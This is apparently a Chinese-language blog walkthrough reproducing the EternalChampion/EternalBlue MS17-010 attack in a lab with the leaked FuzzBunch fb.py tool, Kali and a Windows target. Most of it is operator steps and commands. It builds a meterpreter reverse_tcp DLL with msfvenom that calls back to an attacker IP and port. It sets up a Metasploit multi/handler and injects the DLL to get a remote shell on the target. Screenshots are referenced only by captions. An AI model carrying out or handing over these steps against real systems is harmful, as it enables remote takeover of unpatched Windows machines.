前言:


我单方面认为,永恒冠军是进阶版的永恒之蓝


需要环境:需要一台有ms17010 和一台kali 还有一台靶机


ps:需要在同一局域网内,可以相互ping通


 


pps:永恒冠军和永恒之蓝的关系可以理解成加了内联的sql注入和sql注入的关系


 


复现过程:


1,首先还是像永恒之蓝一样去尝试攻击


具体步骤差不多,就不一一讲述了,可以看上一篇永恒之蓝的


ps:当然是不成功的,不然就没有后面的复现了,但是谢天谢地没有蓝屏


 


2,在已经得到权限的ms17010中使用原生py


进入路径:cd 加上原生py的路径


调用原生py:Python fb.py


永恒冠军(原生py)_重定向


 


2,输入信息(解释看截图)


永恒冠军(原生py)_python_02


PS:关于重定向/日志重定向,一般不,重定向后容易失败


 


PSS:题外话关于重定向


重定向(Redirect)就是通过各种方法将各种网络请求重新定个方向转到其它位置(如:网页重定向、​​域名​​的重定向、路由选择的变化也是对数据报文经由​​路径​​的一种重定向)。


 


3,设置信息(对于没有备注的可以直接照抄)


永恒冠军(原生py)_sql注入_03


 


4,运行永恒之蓝:use Eternalbule


选择更改变量(见图),但其实基本上是不用改的,对照一下基本信息,没问题的话,可以直接无脑下一步


永恒冠军(原生py)_root权限_04


 


5,之后选择一下系统


win2003选0,win7以上选1


永恒冠军(原生py)_root权限_05


然后就开始运行,失败后显示,可以:execute


永恒冠军(原生py)_sql注入_06


成功的话是:


永恒冠军(原生py)_重定向_07


ps:据说这一步是不成功也不影响,但是我后面也没成功,无法验证对不对


 


6,在kali中生成dll(root权限下),然后放到攻击机(ms17010)里


命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.135 LPORT=5555 -f dll >/home/13.dll


PS:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.135 LPORT=5555 -f dll >/home/13.dll   (32位)


永恒冠军(原生py)_重定向_08


dll名称前最好加上路径,不然可能无法生成或找不到


 


7,使用kali,root权限,进入msf(这就不截图了)


设置监听器: use exploit/multi/handler


设置playload:set PAYLOAD windows/meterpreter/reverse_tcp


根据dll修改IP和端口


永恒冠军(原生py)_网络请求_09


 


8,exploit运行,运行后就切换到ms17010


永恒冠军(原生py)_网络请求_10


 


9,然后在ms17010里运行脚本:输入yes,然后无脑下一步,然后输入0,


永恒冠军(原生py)_root权限_11


 


10,然后选择位数,选择dll


永恒冠军(原生py)_python_12


 


11,之后就可以无脑下一步,然后确认信息没有问题,就可以yes开始运行


永恒冠军(原生py)_root权限_13


成功后会显示:


永恒冠军(原生py)_root权限_14


kali会弹meterpreter,shell获得权限


永恒冠军(原生py)_root权限_15


 


 


另:参考教程


​http://note.cfyqy.com/posts/caffa366.html​